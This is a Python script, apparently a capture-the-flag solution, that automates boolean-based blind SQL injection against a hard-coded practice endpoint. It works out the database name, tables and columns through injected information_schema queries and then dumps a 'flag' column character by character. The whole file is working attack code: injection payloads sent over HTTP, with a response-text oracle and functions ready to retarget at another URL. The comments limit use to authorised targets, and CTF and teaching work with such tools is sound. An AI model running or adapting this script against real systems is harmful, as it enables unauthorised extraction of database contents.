脚本:
# Boolean-based blind SQL injection, Python script. The oracle is the word
# "Hello" in the response: present = injected condition true, absent = false.
# Adapted from: https://blog.csdn.net/weixin_40709439/article/details/81355856
# Run this only against targets you are authorized to test (the hard-coded
# host below is a CTF practice endpoint).
import requests as rq
import re
import time
# Target of the boolean-based blind injection (a CTF practice endpoint).
url = 'http://ctf5.shiyanbar.com/web/index_3.php'

# Candidate characters, tried in this order for every guessed position.
mystr = "0123456789" + "abcdefghijklmnopqrstuvwxyz"          # digits + lowercase: db/table names
m_str = "sqcwertyuioplkjhgfdazxvbnm"                           # lowercase only, keyboard-ish order: column names
flag_str = mystr + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "}@_{"       # adds uppercase and flag punctuation: row data
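# Guess the length of the current database name.
def c_dblength(*, max_len=4, timeout=10):
    """Return the length of ``database()`` on the target, or 0 if not found.

    Probes ``length(database())=N`` for N in 1..max_len and treats the word
    "Hello" in the response body as the "true" branch of the injected
    condition.

    Args:
        max_len: largest length tried (the original loop stopped at 4).
        timeout: per-request timeout in seconds; without one a stalled
            target would hang the whole script.
    Returns:
        The first N the oracle confirmed, else 0. The 0 case is printed as a
        warning so it is not silently passed on to ``c_dbname``.
    Raises:
        ``requests`` exceptions (e.g. a timeout) propagate to the caller.
    """
    for n in range(1, max_len + 1):
        # '%' is doubled because this is a %-format string; %23 is the '#'
        # that comments out the remainder of the original query.
        data = "?id=1' and length(database())=%d%%23" % n
        response = rq.get(url + data, timeout=timeout)
        if "Hello" in response.text:
            print(n)
            return n
    print("c_dblength: no length in 1..%d answered true" % max_len)
    return 0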
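# Guess the database name one character position at a time.
def c_dbname(len, *, charset=None, timeout=10):
    """Print and return the database name recovered by char-by-char guessing.

    For each position 1..len, every candidate character is compared against
    ``ascii(substr(database(), pos, 1))`` until the oracle answers true.

    Args:
        len: name length (from ``c_dblength``). The parameter keeps its
            original name, although it shadows the builtin, so existing
            callers are unaffected.
        charset: candidates per position; defaults to module-level ``mystr``
            (digits + lowercase), which cannot recover '_' or uppercase.
        timeout: per-request timeout in seconds.
    Returns:
        The recovered name. A position no candidate matched is skipped and
        reported, so a result shorter than ``len`` means the charset was too
        small rather than a successful guess.
    """
    candidates = mystr if charset is None else charset
    name = ""
    for pos in range(1, len + 1):
        for ch in candidates:
            # ord() gives the decimal code compared with MySQL's ascii().
            data = "?id=1' and ascii(substr(database(),%d,1))=%s%%23" % (pos, ord(ch))
            response = rq.get(url + data, timeout=timeout)
            if "Hello" in response.text:
                name += ch
                break
        else:
            print("c_dbname: no candidate matched position %d" % pos)
    print(name)
    return name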
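# Guess how many tables the current database contains.
def c_tbcount(*, max_count=3, timeout=10):
    """Return the number of tables in ``database()``, or 0 if not found.

    Probes ``count(table_name)`` from ``information_schema.tables`` for the
    current schema against N in 1..max_count.

    Args:
        max_count: largest count tried (the original loop stopped at 3).
        timeout: per-request timeout in seconds.
    Returns:
        The first N the oracle confirmed, else 0 (reported, since a silent 0
        would make ``c_tbname`` do nothing).
    """
    for n in range(1, max_count + 1):
        data = ("?id=1' and (select count(table_name) from information_schema.tables"
                " where table_schema=database())=%d%%23" % n)
        response = rq.get(url + data, timeout=timeout)
        if "Hello" in response.text:
            print(n)
            return n
    print("c_tbcount: no count in 1..%d answered true" % max_count)
    return 0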
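# Guess each table name the same way as the database name: length first,
# then one character per position.
def c_tbname(ct, *, max_len=7, charset=None, delay=2, timeout=10):
    """Print and return the names of the first ``ct`` tables in ``database()``.

    Table i is addressed with ``limit i,1`` on ``information_schema.tables``.

    Args:
        ct: number of tables (from ``c_tbcount``).
        max_len: longest name length tried (the original loop stopped at 7).
        charset: candidates per position; defaults to module-level ``mystr``.
        delay: seconds slept before every character probe, to go easy on the
            target.
        timeout: per-request timeout in seconds.
    Returns:
        A list with one recovered name per table index. A name whose length
        probe found nothing is returned as "" and reported.
    """
    candidates = mystr if charset is None else charset
    subquery = ("(select table_name from information_schema.tables"
                " where table_schema=database() limit %d,1)")
    names = []
    for idx in range(ct):
        sub = subquery % idx
        # 1) length of this table's name
        length = 0
        for n in range(1, max_len + 1):
            data = "?id=1' and length(%s)=%d%%23" % (sub, n)
            response = rq.get(url + data, timeout=timeout)
            if "Hello" in response.text:
                length = n
                break
        print(length)
        if length == 0:
            print("c_tbname: table %d: no length in 1..%d answered true" % (idx, max_len))
        # 2) its characters
        name = ""
        for pos in range(1, length + 1):
            for ch in candidates:
                data = "?id=1' and (ascii(substr(%s,%d,1)))=%s%%23" % (sub, pos, ord(ch))
                time.sleep(delay)
                response = rq.get(url + data, timeout=timeout)
                if "Hello" in response.text:
                    name += ch
                    break
            else:
                print("c_tbname: table %d: no candidate matched position %d" % (idx, pos))
        print(name)
        names.append(name)
    return names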
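############################################################### columns
# Guess one column name of a table: length first, then characters.
def c_colname(mytables, *, col_index=0, max_len=7, charset=None, timeout=10):
    """Print and return a column name of table ``mytables``.

    Queries ``information_schema.columns where table_name='<mytables>'`` and
    picks column ``col_index`` with ``limit col_index,1`` (``limit 0,1`` is
    what the original ``limit 1`` selected). Note the lookup is not
    restricted to ``table_schema=database()``, so a same-named table in
    another schema could be matched first.

    Args:
        mytables: table name, spliced verbatim into a quoted SQL literal of
            the injected query — a value containing a quote would break the
            probe.
        col_index: zero-based column position to recover.
        max_len: longest name length tried (the original loop stopped at 7).
        charset: candidates per position; defaults to module-level ``m_str``
            (lowercase letters only).
        timeout: per-request timeout in seconds.
    Returns:
        The recovered column name ("" if no length matched, which is
        reported).
    """
    candidates = m_str if charset is None else charset
    sub = ("(select column_name from information_schema.columns"
           " where table_name='%s' limit %d,1)" % (mytables, col_index))
    # 1) length of the column name
    length = 0
    for n in range(1, max_len + 1):
        data = "?id=1' and length(%s)=%d%%23" % (sub, n)
        response = rq.get(url + data, timeout=timeout)
        if "Hello" in response.text:
            length = n
            break
    print(length)
    if length == 0:
        print("c_colname: no length in 1..%d answered true" % max_len)
    # 2) its characters
    name = ""
    for pos in range(1, length + 1):
        for ch in candidates:
            data = "?id=1' and (ascii(substr(%s,%d,1)))=%s%%23" % (sub, pos, ord(ch))
            response = rq.get(url + data, timeout=timeout)
            if "Hello" in response.text:
                name += ch
                break
        else:
            print("c_colname: no candidate matched position %d" % pos)
    print(name)
    return name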
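# Dump the data: count the rows, then for each row guess the value's length
# and its characters.
def c_flag(mytable, mycolumn, *, max_rows=9, max_len=39, charset=None, delay=1, timeout=10):
    """Print and return the values of ``mycolumn`` in ``mytable``, one per row.

    Fix versus the original: the row loop index was never used, so every
    probe ran the unbounded subquery ``(select col from tbl)``. With more
    than one row MySQL rejects that subquery and every probe reads as false.
    Each row is now selected with ``limit i,1`` and gets its own length.

    Args:
        mytable, mycolumn: spliced verbatim into the injected SQL; they are
            the tester's own inputs, not untrusted data.
        max_rows: largest row count tried (the original loop stopped at 9).
        max_len: longest value length tried (the original loop stopped at 39).
        charset: candidates per position; defaults to module-level
            ``flag_str``.
        delay: seconds slept before every character probe.
        timeout: per-request timeout in seconds.
    Returns:
        A list with one recovered value per row (empty if the row count
        probe found nothing, which is reported).
    """
    candidates = flag_str if charset is None else charset
    # 1) number of rows
    rows = 0
    for n in range(1, max_rows + 1):
        data = "?id=1' and (select count(*) from %s )=%d%%23" % (mytable, n)
        response = rq.get(url + data, timeout=timeout)
        if "Hello" in response.text:
            rows = n
            break
    print(rows)
    if rows == 0:
        print("c_flag: no row count in 1..%d answered true" % max_rows)
    values = []
    for idx in range(rows):
        sub = "(select %s from %s limit %d,1)" % (mycolumn, mytable, idx)
        # 2) length of this row's value
        length = 0
        for n in range(1, max_len + 1):
            data = "?id=1' and length(%s)=%d%%23" % (sub, n)
            response = rq.get(url + data, timeout=timeout)
            if "Hello" in response.text:
                length = n
                break
        print(length)
        if length == 0:
            print("c_flag: row %d: no length in 1..%d answered true" % (idx, max_len))
        # 3) its characters; partial result is printed after every hit so a
        #    long run still shows progress
        value = ""
        for pos in range(1, length + 1):
            for ch in candidates:
                data = "?id=1' and (ascii(substr(%s,%d,1)))=%s%%23" % (sub, pos, ord(ch))
                time.sleep(delay)
                response = rq.get(url + data, timeout=timeout)
                if "Hello" in response.text:
                    value += ch
                    print(value)
                    break
            else:
                print("c_flag: row %d: no candidate matched position %d" % (idx, pos))
        print(value)
        values.append(value)
    return values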
if __name__ == '__main__':
    # Full chain, each step feeding the next. The earlier steps stay
    # commented out because their answers for this target are already known:
    #   length = c_dblength()   -> 4
    #   c_dbname(length)        -> database name
    #   count = c_tbcount()     -> 2
    #   c_tbname(count)         -> tables: flag, web1
    #   c_colname("flag")       -> column: flag
    c_flag("flag", "flag")  # dump the 'flag' column of the 'flag' table